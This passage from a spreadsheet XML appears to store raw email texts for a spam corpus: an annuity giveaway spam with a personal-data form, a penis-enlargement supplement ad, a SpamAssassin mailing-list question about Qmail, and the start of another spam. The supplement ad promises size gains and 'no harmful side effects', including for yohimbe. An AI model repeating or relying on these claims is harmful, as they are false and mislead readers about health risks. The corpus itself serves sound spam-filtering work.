       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/arbor2/top.gif" =
 width=3D"550" height=3D"85" alt=3D'Ann Arbor Annuity Exchange $50,000 =
 Giveaway!'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/arbor2/bottom.jpg" =
 width=3D"550" height=3D"113" alt=3D'When You Think Annuities...Think Ann =
 Arbor'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#FFFF99" align=3D"center"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;Just a short list of the many companies we =
 represent&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
               &lt;table width=3D"30" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/arbor2/insani2.gif" width=3D"447" =
 height=3D"355" border=3D"1"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/arbor2/logo.gif" =
 width=3D"550" height=3D"87"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FFFFFF" border=3D"1" =
 bordercolor=3D"#000000"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#000066"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF" face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Fill =
 out this form for a FREE entry in our $50,000 Giveaway!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Fax:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"fax" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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value=3D"tlucas@a2xonline.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"A2X Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#FFFF99" align=3D"center"&gt;=20
               &lt;font size=3D"1" face=3D"Verdana, Arial, Helvetica, =
 sans-serif" color=3D"#000000"&gt;
               &lt;p&gt;Agent Use Only. Employees and family members of Ann =
 Arbor Annuity Exchange and the &lt;br&gt;
                 subsidiaries are ineligible.&lt;/p&gt;
               &lt;p&gt;We don't want anybody to receive our mailing who does =
 not wish=20
                 to receive them. This is a professional communication =
 sent to=20
                 insurance professionals. To be removed from this mailing =
 list,=20
                 DO NOT REPLY to this message. Instead, go here:
                 &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
               &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_436A1_01C22E78.6D2241B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Have a BLAST in bed&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;font size="6"&gt;Have a BLAST in bed,
 GUARANTEED!&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;img
 src="http://tv-discounters.com/images/leftmax.gif" border="0"
 width="200" height="496" /&gt;&lt;img
 src="http://tv-discounters.com/images/middlemax.gif" border="0"
 width="220" height="496" /&gt;&lt;img
 src="http://tv-discounters.com/images/rightmax.gif" border="0"
 width="200" height="496" /&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;table width="75%" align="center"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;
 &lt;font size="2"&gt;Finally, a safe and natural penile enlargement
 supplement!&lt;br /&gt;
  Naturally boost your sex drive and rejuvenate sexual
 function.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;&lt;img src="http://tv-discounters.com/images/thumbsup.jpg"
 align="left" width="218" height="301" /&gt;Good news, men! Recent
 discoveries in herbal medicine have made it possible for men to
 safely and effectively boost their sexual vitality while increasing
 their penis size by 25% or more!&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Certified Natural Laboratories is pleased to introduce the
 latest addition to their widely acclaimed line of herbal
 supplements: &lt;i&gt;&lt;b&gt;Maxaman&amp;#8482;.&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Specially formulated with herbs and extracts from around
 the globe, Maxaman&amp;#8482; can help to enhance sexual sensitivity,
 increase sexual stamina, and actually increase the size of your
 penis by up to 25%. The special blend of herbs in Maxaman&amp;#8482;
 have been shown to boost blood flow to the penis, thus expanding
 the sponge-like erectile tissue in the penis, leading to size gains
 in both length and thickness.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;A
 recent survey showed that 68% of women are unsatisfied with the
 size of their partners. Of course most of these women would never
 tell their partner that they are unhappy with their penis size.
 Having a small or average-sized penis can result in depression and
 feelings of inadequacy. Thankfully, men of all ages can now safely
 and naturally increase the size of their penis and renew sexual
 vitality without resorting to dangerous surgery.&lt;/font&gt;&lt;/p&gt;
 &lt;table width="570" align="center"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="center"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;What To
 Expect:&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;&lt;b&gt;1-2 weeks&lt;/b&gt;&lt;br /&gt;
  Most men notice more powerful and longer lasting erections almost
 immediately. A noticeable increase in thickness is also
 common.&lt;br /&gt;
 &lt;br /&gt;
  &lt;b&gt;3-8 weeks&lt;/b&gt;&lt;br /&gt;
  By this point you should be able to notice an increase in
 thickness in both erect and flaccid states, as well as an overall
 increase in length.&lt;br /&gt;
 &lt;br /&gt;
  &lt;b&gt;9 weeks +&lt;/b&gt;&lt;br /&gt;
  After nine weeks, your penis should be noticeably larger in both
 length and girth.&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;#160;&lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Below is a comparison chart compiled from the most recent
 data on penis size. See how you measure up...&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;img
 src="http://tv-discounters.com/images/chart.gif" align="right"
 width="231" height="165" /&gt;&lt;b&gt;&lt;i&gt;How to measure your penis size
 correctly:&lt;/i&gt;&lt;/b&gt; To determine length, measure the erect penis
 from the base of the penis where the top of the shaft meets the
 pubic area (the peno-pubic junction) to the tip of the head. For
 uncircumcised men the foreskin should be retracted. To determine
 width, measure at mid-shaft around the circumference while the
 penis is erect.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Whether you have a small, average or large penis, it is now
 possible for you to increase the size of your penis by up to 25%
 without resorting to dangerous surgery or cumbersome
 weights.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;The
 all-natural proprietary blend of unique herbs found in Maxaman is
 designed to restore blood flow, unleash stored testosterone, and
 heighten sensation by activating the body's natural hormone
 production and supplying vital nutrients necessary for peak sexual
 performance. All of the ingredients in Maxaman are stringently
 scrutinized, and are guaranteed to be of the highest pharmaceutical
 grade.&lt;/font&gt;&lt;/p&gt;
 &lt;table cellspacing="4" cellpadding="4" width="95%" align="center"
 border="0"&gt;
 &lt;tbody&gt;
 &lt;tr valign="top" align="left" bordercolor="#ffffff"
 bgcolor="#ffffff"&gt;
 &lt;td height="376"&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font
 color="#006699"&gt;1. How does Maxaman
 work?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;The all
 natural proprietary blend of unique ingredients found in Maxaman is
 designed to restore blood flow, unleash stored testosterone, and
 heighten sensation by activating the body's natural hormone
 production and supplying vital nutrients necessary for peak sexual
 performance. The special blend of herbs in Maxaman have been shown
 to boost blood flow to the penis, thus expanding the sponge-like
 erectile tissue in the penis, leading to size gains in both length
 and thickness.&lt;/font&gt; 
 &lt;p&gt;&lt;font face="arial" color="#006699" size="+0"&gt;&lt;b&gt;&lt;i&gt;2. Is Maxaman
 safe?&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Because
 Maxaman is an all natural nutritional supplement containing only
 the finest botanicals, there are no harmful side effects when taken
 as directed. Maxaman is not a pharmaceutical drug and contains none
 of the synthetic chemicals found in prescription medications. It is
 a safe alternative to dangerous surgery.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;3. What
 can Maxaman do for me?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Common benefits
 from using Maxaman include:&lt;br /&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif"
 size="-1"&gt;Up to a 25% increase in penis length and thickness&lt;br /&gt;
  Increased stamina&lt;br /&gt;
  Improved sexual desire&lt;br /&gt;
  Stronger, more powerful erections&lt;br /&gt;
  Greater control over ejaculation&lt;br /&gt;
  Stronger climaxes and orgasms&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;4. Will
 I experience any side effects?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;There
 are no harmful side effects when taken as directed.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" color="#0066cc" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font
 color="#006699"&gt;5. What ingredients are used in
 Maxaman?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Maxaman is all natural, and made from the finest quality
 botanicals available. To read more about each of these key
 ingredients, please read below for all the details.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;6. How
 should I use Maxaman?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;The normal
 dosage of Maxaman is two capsules with a meal and a glass of water.
 The cumulative effects of Maxaman increase with each dosage, making
 it even more effective with continued use. Do not exceed six
 capsules daily&lt;/font&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;7. Do I
 need a prescription to use Maxaman?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;No you do not.
 Because Maxaman is an all natural nutritional supplement containing
 only the finest botanicals, there is no need to obtain a
 prescription.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;8. How
 does Maxaman differ from other penis lengthening
 procedures?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Maxaman is not
 a pharmaceutical drug and contains none of the synthetic chemicals
 found in prescription medications. It is an all natural formula
 designed to boost blood flow to the penis, thus expanding the
 sponge-like erectile tissue in the penis, leading to size gains in
 both length and thickness. Maxaman provides men with a safe and
 natural alternative to potentially dangerous
 surgery.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;9. How
 long will it take to get my order?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font size="-1"&gt;Shipped the same day payment is received in most
 cases..&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" color="#3366cc" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font
 color="#0069c0"&gt;10. Is it really safe to order
 online?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Absolutely!
 All information about your order is encrypted, and cannot be viewed
 by anyone else. Ordering online using this state-of-the-art
 processing system is actually much safer than using your credit
 card in a restaurant or at the mall.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;11. Is
 Maxaman shipped discreetly?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Yes it is!
 Maxaman is sent in an unmarked box with no indication whatsoever as
 to what is contained inside.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;11. How
 much is shipping and handling?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;
 $6.95&lt;font size="3"&gt; for the 1st. bottle&lt;/font&gt; and free for any
 order more than 1 bottle.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="3"&gt;&amp;#160;&lt;/font&gt;&lt;/p&gt;
 &lt;table cellspacing="4" cellpadding="4" width="95%" align="center"
 border="0"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td valign="top" align="middle"&gt;
 &lt;div align="left"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;The special
 blend of herbs in &lt;b&gt;Maxaman&lt;/b&gt;&amp;#8482; have been shown to boost
 blood flow to the penis, thus expanding the sponge-like erectile
 tissue in the penis, leading to size gains in both length and
 thickness.&lt;br /&gt;
  &amp;#160;&lt;/font&gt; 
 &lt;p align="center"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font
 face="Arial, Helvetica, sans-serif"&gt;The proprietary blend of herbs
 found in Maxaman&amp;#8482; consists of:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Zinc (as zinc oxide)&lt;/b&gt; - This essential mineral is required for
 protein synthesis and collagen formation. Sufficient intake and
 absorption of zinc are needed to maintain a proper concentration of
 Vitamin E.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Yohimbe&lt;/b&gt; - Used traditionally to treat impotence and frigidity,
 Yohimbe helps to increase blood flow and sensitivity of nerves,
 especially in the pelvic region. It is commonly used as an
 aphrodisiac to stimulate sexual organs and improve central nervous
 system function.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Maca -&lt;/b&gt; Maca is an adaptogen. It works to create harmony in the
 body, regulating levels of hormones and enzymes to create a state
 of homeostasis.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Catuaba&lt;/b&gt; - Native to Brazil and parts of the Amazon, Catuaba is
 a central nervous system stimulant commonly used throughout the
 world for treating sexual impotence, exhaustion and fatigue.&lt;br /&gt;
 &lt;br /&gt;
  &lt;b&gt;Muira Puama&lt;/b&gt; - A South American herb, Muira Puama has been
 used to treat impotence for hundreds of years. It is highly sought
 after for its strong stimulant qualities.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Oyster Meat -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; Historically
 known as an aphrodisiac, oyster meat contains flavonoids that have
 been shown to stimulate the reproductive system.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 L-Arginine -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; L-Arginine
 is an amino acid which helps to create nitric oxide in the human
 body. Nitric oxide is the most essential substance influencing
 sexual function in both men and women. Nitric oxide promotes
 circulation, resulting in improved blood flow.&lt;/font&gt;&lt;br /&gt;
  &amp;#160;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Oatstraw -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; Used to
 treat fatigue and exhaustion, Oatstraw improves brain and nervous
 system function and has been used to treat impotence. It is
 extremely useful for aiding your body in recovering from
 exhaustion, as well as correcting sexual debility.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Nettle Leaf -&lt;/font&gt;&lt;/b&gt; &lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Acts as a
 diuretic, expectorant and tonic. It is rich in iron and chlorophyll
 to clean and nourish the blood.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#000000" size="2"&gt;&lt;b&gt;Cayenne&lt;/b&gt; - Cayenne improves
 circulation, increases the metabolic rate and acts as a catalyst
 for other herbs.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#000000" size="2"&gt;&lt;b&gt;Pumpkin Seed -&lt;/b&gt; Pumpkin seed is
 commonly used to strengthen the prostate gland and promote male
 hormone function. Myosin, an amino acid found in pumpkin seeds, is
 known to be essential for muscular contractions.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Sarsaparilla -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; Found along
 the coast of Peru, Sarsaparilla aids in the production of
 testosterone and progesterone.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Orchic Substance -&lt;/font&gt;&lt;/b&gt; &lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;This is an
 extract from bovine testes, and is proven to increase testosterone
 levels without harmful steroids.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Licorice Root&lt;/b&gt; - Licorice root fights inflammation, as well as
 viral, bacterial and parasitic infection. Licorice cleanses the
 colon, and enhances microcirculation in the gastrointestinal
 lining.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Tribulus&lt;/b&gt; - A natural testosterone enhancer, Tribulus can
 improve desire and performance and increase sexual energy. Tribulus
 is also an excellent circulatory and heart tonic and can help
 dilate arteries. In India it is used as a tonic for the urinary
 system.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Ginseng Blend (Siberian, American &amp;amp; Korean)&lt;/b&gt; -&lt;/font&gt; &lt;font
 face="Verdana, Arial, Helvetica, sans-serif" color="#000000"
 size="2"&gt;Commonly used by athletes for overall body strengthening,
 Ginseng fortifies the adrenal gland, and promotes healthy
 circulation. It increases the conversion rate of sugars into the
 necessary substrates for the formation of fatty acids in the liver.
 Ginseng stimulates the central nervous system, and is a quick
 antidote for fatigue.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#000000" size="2"&gt;&lt;b&gt;Astragalus&lt;/b&gt; - Regarded as a potent
 tonic for increasing energy levels and stimulating the immune
 system, Astragalus has also been employed effectively as a
 diuretic.&lt;/font&gt;&lt;/p&gt;
 &lt;div align="center"&gt;
 &lt;div align="left"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Boron&lt;/b&gt;
 - Boron helps to prevent the loss of calcium, phosphorus and
 magnesium through the urine.&lt;br /&gt;
  &amp;#160;&lt;/font&gt;&lt;/div&gt;
 &lt;/div&gt;
 &lt;p align="center"&gt;&lt;img
 src="http://tv-discounters.com/images/smallsupfactz.gif"
 width="332" height="393" /&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;a
 href="http://tv-discounters.com/images/maxaman.htm"&gt;&lt;font size="6"&gt;
 ORDER NOW!&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;img
 src="file://tv-discounters.com/images/guarantee.gif" border="0"
 width="95" height="96" /&gt;&lt;/p&gt;
 &lt;b&gt;Afraid its not for you? Don't worry we offer a LIFETIME
 Guarantee! If your not ecstatic with our product, just return the
 unused portion for a FULL Refund!! No questions will be
 asked!&lt;br /&gt;
 &lt;br /&gt;
 &lt;/b&gt; 
 &lt;center&gt;Thank you for your time and I hope to hear from you
 soon!&lt;/center&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 1701xdps5-747FzMY4320pCqi6-565wtfS4386DsOo6-564l44
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Sitewide Spam Filtering with Qmail ??
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all...
 I'm new to SpamAssasin so I appologies if the question has been asked
 before.
 I'm thinking of setting up SA with my Qmail(Maildir) server acting as our
 gateway.
 It currently provides inline virus scanning and ORDB open relay filtering.
 Is it possible to setup SA to act as a sitewide Spam filter ?
 Is there any documentation on setting this up ?
 The Qmail server does not house any local mail accounts, it acts as a pure
 relay for our internal mail server, I am currently relaing mail for 8
 internal domains...
 Suggestions would be appreciated.
 Regards
 Zenn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</si>
  <si>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FREE ORIGINAL STAR WARS CARS Adv:
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_434_2562770446087
 Content-Type: text/plain;
 	charset=us-ascii
 Content-Transfer-Encoding: 7BIT
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META NAME="GENERATOR" Content="Microsoft Developer Studio"&gt;
 &lt;META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;TITLE&gt;Document Title&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 	&lt;table width=600 align="center" cellspacing=0 cellpadding=0&gt;
 		&lt;tr align="center"&gt;
 			&lt;td colspan=3 bgcolor=black&gt;
